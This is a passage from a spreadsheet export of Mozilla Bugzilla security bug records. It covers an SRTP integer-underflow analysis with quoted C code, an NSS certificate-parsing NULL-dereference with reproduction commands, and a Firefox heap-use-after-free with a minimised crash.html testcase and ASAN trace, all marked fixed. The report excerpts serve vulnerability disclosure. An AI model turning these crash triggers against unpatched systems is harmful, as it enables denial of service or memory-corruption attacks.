          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K5663" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L5663" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5663" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5663" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5663" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5663" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5663" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5663" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T5663" t="n">
        <v>1</v>
      </c>
      <c r="U5663" t="n">
        <v>0</v>
      </c>
      <c r="V5663" t="n">
        <v>33</v>
      </c>
      <c r="W5663" t="inlineStr">
        <is>
          <t>srtp_unprotect (netwerk\srtp\src\srtp\srtp.c) can experience an integer underflow. If it does, it calls a decryption function with a buffer pointer pointing to memory to which it has no right, and with a very large buffer length. This call could scramble large portions of memory, causing incorrect and possibly insecure behavior.
It is unclear whether the bug can be invoked, because that depends upon behavior of a decryption function that I don't currently understand.
(There is also a similar bug in srtp_unprotect_rtcp).
Details
-------
The bug is in this code:
950: err_status_t
951: srtp_unprotect(srtp_ctx_t *ctx, void *srtp_hdr, int *pkt_octet_len) {
...
1073:   if (stream-&gt;rtp_services &amp; sec_serv_conf) {
1074:     enc_start = (uint32_t *)hdr + uint32s_in_rtp_header + hdr-&gt;cc;  
1075:     if (hdr-&gt;x == 1) {
1076:       srtp_hdr_xtnd_t *xtn_hdr = (srtp_hdr_xtnd_t *)enc_start;
1077:       enc_start += (ntohs(xtn_hdr-&gt;length) + 1);
1078:     }  
1079:     enc_octet_len = (uint32_t)(*pkt_octet_len - tag_len 
1080: 			       - ((enc_start - (uint32_t *)hdr) &lt;&lt; 2));
1081:   } else {
1082:     enc_start = NULL;
1083:   }
...
1162:   if (enc_start) {
1163:     status = cipher_decrypt(stream-&gt;rtp_cipher, 
1164: 			    (uint8_t *)enc_start, &amp;enc_octet_len);
1165:     if (status)
1166:       return err_status_cipher_fail;
1167:   }
which does not check whether |hdr-&gt;cc| (line 1074) and |xtn_hdr-&gt;length| (line 1077) are such that any portion of the region described by |enc_start| and |enc_octet_len| lies outside of the packet that begins at |hdr| and extends for |*pkt_octet_len| bytes.
When using Firefox Hello, |cipher_decrypt| devolves to |aes_icm_encrypt_ismacryp| (netwerk\srtp\src\crypto\cipher\aes_icm.c), which checks the decryption buffer length thusly:
344: err_status_t
345: aes_icm_encrypt_ismacryp(aes_icm_ctx_t *c,
346:               unsigned char *buf, unsigned int *enc_len, 
347:               int forIsmacryp) {
348:   unsigned int bytes_to_encr = *enc_len;
349:   unsigned int i;
350:   uint32_t *b;
351:
352:   /* check that there's enough segment left but not for ismacryp*/
353:   if (!forIsmacryp &amp;&amp; (bytes_to_encr + htons(c-&gt;counter.v16[7])) &gt; 0xffff)
354:     return err_status_terminus;
...
with |forIsmacryp| == false. I don't understand how |c-&gt;counter.v16[7]| is used. If it can ever be &gt;= 0x0400 (&gt;= 4 when decoded), then an attacking peer can send a malformed packet that yields an |*enc_len| &lt;= 0xfffffffc, which will pass the test on line 353 and cause aes_icm_encrypt_ismacryp to scramble |*enc_len| bytes of memory.
|c-&gt;counter.v16[7]| has never been nonzero in my testing using Firefox Hello.</t>
        </is>
      </c>
      <c r="X5663" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5664">
      <c r="A5664" t="n">
        <v>1533216</v>
      </c>
      <c r="B5664" t="inlineStr">
        <is>
          <t>2019-03-06 17:39:34 -0800</t>
        </is>
      </c>
      <c r="C5664" t="inlineStr">
        <is>
          <t>CERT_DecodeCertPackage() crash with Netscape Certificate Sequences</t>
        </is>
      </c>
      <c r="D5664" t="inlineStr">
        <is>
          <t>2020-08-08 09:36:50 -0700</t>
        </is>
      </c>
      <c r="E5664" t="n">
        <v>1</v>
      </c>
      <c r="F5664" t="n">
        <v>1</v>
      </c>
      <c r="G5664" t="n">
        <v>3</v>
      </c>
      <c r="H5664" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5664" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5664" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5664" t="inlineStr">
        <is>
          <t>3.44</t>
        </is>
      </c>
      <c r="L5664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5664" t="inlineStr"/>
      <c r="Q5664" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5664" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5664" t="inlineStr">
        <is>
          <t>3.44</t>
        </is>
      </c>
      <c r="T5664" t="n">
        <v>1</v>
      </c>
      <c r="U5664" t="n">
        <v>0</v>
      </c>
      <c r="V5664" t="n">
        <v>9</v>
      </c>
      <c r="W5664" t="inlineStr">
        <is>
          <t>Created attachment 9049058
crash testcase
I noticed that the main entrypoint for decoding DER blobs in NSS, `CERT_DecodeCertPackage()`, actually handles multiple formats including PEM, PKCS7, and old Netscape Certificate Sequences.
You can generate a Netscape Certificate Sequence with the OpenSSL `nseq` tool, I just did this:
```
$ openssl nseq -in mail.google.com.pem -toseq -out nseq.pem
```
I guessed that this format might not have been as well audited as others, so fuzzed it and it crashed with a NULL deref quickly.
Test case attached, I'm guessing this means any client or server that handles untrusted certificates can be crashed, I didn't try it against Firefox.
You can verify it like this:
```
$ certutil -d "." -A -n test -t "p,p,p" -i nss-nseq-crash.der
Segmentation fault
```
I suppose this is a trivial denial of service issue against the network daemons that use NSS.</t>
        </is>
      </c>
      <c r="X5664" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5665">
      <c r="A5665" t="n">
        <v>1558154</v>
      </c>
      <c r="B5665" t="inlineStr">
        <is>
          <t>2019-06-10 03:35:57 -0700</t>
        </is>
      </c>
      <c r="C5665" t="inlineStr">
        <is>
          <t>When an error is encountered during landing, please preserve the \n</t>
        </is>
      </c>
      <c r="D5665" t="inlineStr">
        <is>
          <t>2020-07-29 09:27:35 -0700</t>
        </is>
      </c>
      <c r="E5665" t="n">
        <v>1</v>
      </c>
      <c r="F5665" t="n">
        <v>1</v>
      </c>
      <c r="G5665" t="n">
        <v>7</v>
      </c>
      <c r="H5665" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5665" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J5665" t="inlineStr">
        <is>
          <t>Lando</t>
        </is>
      </c>
      <c r="K5665" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5665" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5665" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5665" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5665" t="inlineStr"/>
      <c r="Q5665" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5665" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5665" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5665" t="n">
        <v>1</v>
      </c>
      <c r="U5665" t="n">
        <v>0</v>
      </c>
      <c r="V5665" t="n">
        <v>5</v>
      </c>
      <c r="W5665" t="inlineStr">
        <is>
          <t>For example, it is hard to read the first error message:
https://lando.services.mozilla.com/D31969/</t>
        </is>
      </c>
      <c r="X5665" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5666">
      <c r="A5666" t="n">
        <v>1417405</v>
      </c>
      <c r="B5666" t="inlineStr">
        <is>
          <t>2017-11-15 04:25:25 -0800</t>
        </is>
      </c>
      <c r="C5666" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsIDocument::IsPotentiallyScrollable</t>
        </is>
      </c>
      <c r="D5666" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:24 -0700</t>
        </is>
      </c>
      <c r="E5666" t="n">
        <v>1</v>
      </c>
      <c r="F5666" t="n">
        <v>1</v>
      </c>
      <c r="G5666" t="n">
        <v>3</v>
      </c>
      <c r="H5666" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5666" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5666" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5666" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5666" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5666" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5666" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5666" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5666" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5666" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5666" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T5666" t="n">
        <v>1</v>
      </c>
      <c r="U5666" t="n">
        <v>0</v>
      </c>
      <c r="V5666" t="n">
        <v>17</v>
      </c>
      <c r="W5666" t="inlineStr">
        <is>
          <t>Created attachment 8928494
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox nightly (SourceStamp=f0c0fb9182d695081edf170d8e3bcb8164f2c96a). The testcase requires the fuzzPriv extension.
crash.html:
&lt;script&gt;
function start() {
	o37=document.createElement('iframe');
	document.documentElement.appendChild(o37);
	o259=o37.contentDocument;
	o290=document.createElement('marquee');
	document.documentElement.appendChild(o290);
 	document.documentElement.addEventListener('DOMAttrModified',fun0);
	o259.scrollingElement;
}
function fun0() {
	o259.write('&lt;div&gt;');
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==25937==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000438fc at pc 0x7f903decfd56 bp 0x7ffddcf68840 sp 0x7ffddcf68838
READ of size 4 at 0x60d0000438fc thread T0 (file:// Content)
    #0 0x7f903decfd55 in GetBoolFlag /builds/worker/workspace/build/src/dom/base/nsINode.h:1614:12
    #1 0x7f903decfd55 in IsInUncomposedDoc /builds/worker/workspace/build/src/dom/base/nsINode.h:545
    #2 0x7f903decfd55 in GetPrimaryFrame /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:959
    #3 0x7f903decfd55 in GetPrimaryFrame /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1267
    #4 0x7f903decfd55 in nsIDocument::IsPotentiallyScrollable(mozilla::dom::HTMLBodyElement*) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:11007
    #5 0x7f903ded00e6 in nsIDocument::GetScrollingElement() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:11038:18
    #6 0x7f903f4ac198 in mozilla::dom::DocumentBinding::get_scrollingElement(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:4096:59
    #7 0x7f903fa1bbe6 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
    #8 0x7f9045e5f2b0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #9 0x7f9045e5f2b0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #10 0x7f9045e61285 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #11 0x7f9045e61285 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #12 0x7f9045e61285 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #13 0x7f9046de3b8c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2118:16
    #14 0x7f9046de3b8c in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2171
    #15 0x7f9046de3b8c in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2374
    #16 0x7f9046de3b8c in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2410
    #17 0x7f904689f71c in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1616:12
    #18 0x7f904689f71c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2719
    #19 0x7f903fa13e1f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, bool*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2096:10
    #20 0x7f903f6dd6f6 in mozilla::dom::HTMLDocumentBinding::DOMProxyHandler::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:2189:8
    #21 0x7f9046b24370 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:352:21
    #22 0x7f9046b24370 in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:362
    #23 0x7f9046b4896b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1615:16
    #24 0x7f9046b4896b in js::ForwardingProxyHandler::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:154
    #25 0x7f9046afbc88 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #26 0x7f9046b24370 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:352:21
    #27 0x7f9046b24370 in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:362
    #28 0x7f9045e6a8cb in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1615:16
    #29 0x7f9045e6a8cb in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:805
    #30 0x7f9045e6a8cb in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4407
    #31 0x7f9045e4cfe4 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #32 0x7f9045e4cfe4 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2817
    #33 0x7f9045e3287a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #34 0x7f9045e5f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #35 0x7f9045e602a2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #36 0x7f90468a511b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #37 0x7f903f439b45 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #38 0x7f903fe440ed in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #39 0x7f903fe440ed in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #40 0x7f903fe0c176 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #41 0x7f903fe0e342 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #42 0x7f903fdeda61 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #43 0x7f903fdf0f32 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #44 0x7f90421018ae in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #45 0x7f904519ffc1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7779:21
    #46 0x7f904519bfe4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7577:7
    #47 0x7f90451a386f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7474:13
    #48 0x7f903cce2783 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #49 0x7f903cce18ec in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #50 0x7f903ccde978 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #51 0x7f903cce0892 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #52 0x7f903cce14ec in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #53 0x7f903b264be0 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #54 0x7f903dec066d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9379:18
    #55 0x7f903dec0231 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9301:9
    #56 0x7f903de99e79 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5666:3
    #57 0x7f903df3b542 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #58 0x7f903df3b542 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #59 0x7f903df3b542 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #60 0x7f903b0974f1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #61 0x7f903b0bce86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #62 0x7f903b0d7618 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #63 0x7f903be87e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #64 0x7f903bde848b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #65 0x7f903bde848b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #66 0x7f903bde848b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #67 0x7f904187da0f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #68 0x7f9045bb4e47 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #69 0x7f903bde848b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #70 0x7f903bde848b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #71 0x7f903bde848b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #72 0x7f9045bb47fa in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #73 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #74 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #75 0x7f905886b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #76 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x60d0000438fc is located 28 bytes inside of 136-byte region [0x60d0000438e0,0x60d000043968)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f903af57067 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7f903af5e70b in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7f903af5e70b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7f903af5dc23 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7f903af61a70 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7f903dfa574d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1505:3
    #7 0x7f903daf2feb in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1437:3
    #8 0x7f903b0e77e1 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7f903c8cee40 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7f903c8cee40 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7f903c8cee40 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7f903c8d5bcf in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7f9045e5f2b0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #14 0x7f9045e5f2b0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #15 0x7f9045e4a7ec in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #16 0x7f9045e4a7ec in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #17 0x7f9045e3287a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #18 0x7f9045e5f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #19 0x7f9045e602a2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #20 0x7f90468a3293 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2973:12
    #21 0x7f903c7ee35b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f9045e5f2b0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #23 0x7f9045e5f2b0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #24 0x7f9045e4a7ec in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #25 0x7f9045e4a7ec in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #26 0x7f9045e3287a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
